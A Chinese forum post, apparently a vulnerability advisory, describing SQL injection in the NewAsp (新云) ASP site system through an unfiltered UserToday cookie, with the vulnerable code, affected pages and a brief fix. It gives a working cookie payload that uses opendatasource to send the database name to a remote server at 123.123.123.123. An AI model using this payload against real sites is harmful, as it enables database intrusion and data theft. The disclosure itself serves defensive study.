新云的最新注入漏洞
<DIV id=connent><U><FONT color=#800080>新云 </FONT></U><A href="http://www.newasp.net/code/asp/22579.html" target=_blank>http://www.newasp.net/code/asp/22579.html</A></DIV><DIV> </DIV>
<DIV> </DIV>
<DIV>安全综述:<BR><BR>新云网站管理系统是一个采用ASP和MSSQL等其他多种数据库生成静态页面构建的高效网站解决方案。<BR><BR>漏洞描述:<BR><BR>先看const.asp的GetUserTodayInfo过程。<BR><BR>QUOTE:<BR>Lastlogin = Request.Cookies("newasp_net")("LastTime")<BR>UserDayInfo = Request.Cookies("newasp_net")("UserToday")<BR>If DateDiff("d",LastLogin,Now())<>0 Then<BR>………………<BR>UserDayInfo = "0,0,0,0,0,0"<BR>Response.Cookies("newasp_net")("UserToday") = UserDayInfo<BR>end if<BR>UserToday = Split(UserDayInfo, ",")<BR>If Ubound(UserToday) <> 5 Then<BR>………………<BR>UserDayInfo = "0,0,0,0,0,0"<BR>Response.Cookies("newasp_net")("UserToday") = UserDayInfo<BR>end if<BR><BR>然后是<BR><BR>QUOTE:<BR>Public Function updateUserToday(ByVal str)<BR>On Error Resume Next<BR>If Trim(str) <> "" Then<BR>Newasp.Execute("update SET UserToday='" & str & "' where username='"& Newasp.membername &"' And userid=" & Newasp.memberid)<BR>Response.Cookies("newasp_net")("UserToday") = str<BR>End If<BR>End Function<BR><BR>大家都能看出来。updateUserToday(ByVal str)str没有经过任何过滤就防进了数据库。<BR><BR>然后就是<BR>articlepost.asp<BR>message.asp<BR>softpost.asp<BR>upfile.asp<BR>upload.asp<BR>这几个文件对GetUserTodayInfo和updateUserToday过程没有验证的直接调用,导致了sql注入<BR><BR>解决方案:<BR><BR>过滤UserDayInfo<BR><BR>测试方法:<BR><BR>警 告<BR>以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<BR><BR>Sobiny(Bug.Center.Team)提供了如下测试方法:<BR><BR>由于UserDayInfo的格式是 0,0,0,0,0,0每一个字符代表了今天使用的权限,有上传,有短信。<BR>而每使用一次权限,使用权限的那个一数字就会自加1。<BR>所以在构造语句的时候要注意。<BR>在提交的页面的过程中。<BR>在当前权限的数量上必须为数字,否则就会发生错误。<BR>而且updateUserToday过程On Error Resume Next语句,已经屏蔽了错误提示,所以我采用opendatasource远程数据库写入。<BR><BR>以message.asp为例<BR>先发送一条信息抓包,然后修改cookies。<BR>(发送信息代码的数字为第5个。于是我们在第4个','只后,第5个','之前的字符必须为数字。)<BR><BR>于是我们修改如下cookies:<BR><BR>QUOTE:<BR>newasp_net=UserToday=0%2c0%2c0%2c0%2c0%2c0<BR><BR>为<BR><BR>QUOTE:<BR>newasp_net=UserToday=%27%3Binsert+into+opendatasource%28%27sqloledb%27%2C%27<BR>server%3D123%2E123%2E123%2E123%3Buid%3Dadmin%3Bpwd%3Dadminadmin%3Bdatabase%3D<BR>admin%27%29%2Eadmin%2Edbo%2Eku+select+db%5Fname%280%29%2D%2D%2c0%2c0%2c0%2c0<BR><BR>然后用NC发包<BR><BR>就会在远程123.123.123.123服务器上的数据库写入当前的库名。<BR><BR>QUOTE:<BR>%27%3Binsert+into+opendatasource%28%27sqloledb%27%2C%27server%3D123%2E123%2E123%2E<BR>123%3Buid%3Dadmin%3Bpwd%3Dadminadmin%3Bdatabase%3Dadmin%27%29%2Eadmin%2Edbo%2E<BR>ku+select+db%5Fname%280%29%2D%2D%2c0%2c0%2c0%2c0<BR><BR>为<BR><BR>QUOTE:<BR>';insert into opendatasource('sqloledb','server=123.123.123.123;uid=admin;pwd=adminadmin;database=admin').admin.dbo.ku select db_name(0)--,0,0,0,0 </DIV>
re:新云的最新注入漏洞
setretert
页:
[1]